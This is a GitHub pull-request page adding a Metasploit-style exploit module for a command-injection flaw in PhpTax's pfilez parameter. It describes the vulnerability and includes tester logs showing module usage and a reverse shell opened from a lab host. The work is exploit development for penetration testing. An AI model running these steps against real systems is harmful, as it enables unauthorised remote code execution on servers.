Add PhpTax pfilez exec module #873
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This module exploits a vuln found in PhpTax. When generating a PDF, the icondrawpng() function in drawimage.php does not properly handle the pfilez parameter, which will be used in a exec() statement, and results in arbitrary code execution.
|
Might be able to use find_* payloads if the target is Apache. |
|
Tested and working:
msf exploit(phptax_exec) > check [*] The target service is running, but could not be validated.
msf exploit(phptax_exec) > rexploit [*] Reloading module... [*] 192.168.1.13080 - Sending request... [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 2hfAYZKZSnpQC1A7; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "2hfAYZKZSnpQC1A7\r\n" [*] Matching... [*] B is input... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.130:38738) at 2012-10-08 22:05:17 +0200 [*] Command: echo oxzs3fgLjxgIHwLT; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "oxzs3fgLjxgIHwLT\r\n" id uid=33(www-data) gid=33(www-data) groups=33(www-data) Since there are other comments, awaiting for a response before merging. |
|
retested and working, merged! msf > use exploit/multi/http/phptax_exec msf exploit(phptax_exec) > set RHOST 192.168.1.130 RHOST => 192.168.1.130 msf exploit(phptax_exec) > rexploit [*] Reloading module... [*] 192.168.1.13080 - Sending request... [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo Z1QbpPzF2ZpaAA1u; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "Z1QbpPzF2ZpaAA1u\r\n" [*] Matching... [*] B is input... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.130:38755) at 2012-10-09 00:07:38 +0200 [*] Command: echo qMoBSQjd9CkLXD4D; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This module exploits a vuln found in PhpTax. When generating a PDF, the icondrawpng() function in drawimage.php does not properly handle the pfilez parameter, which will be used in a exec() statement, and results in arbitrary code execution.
Test: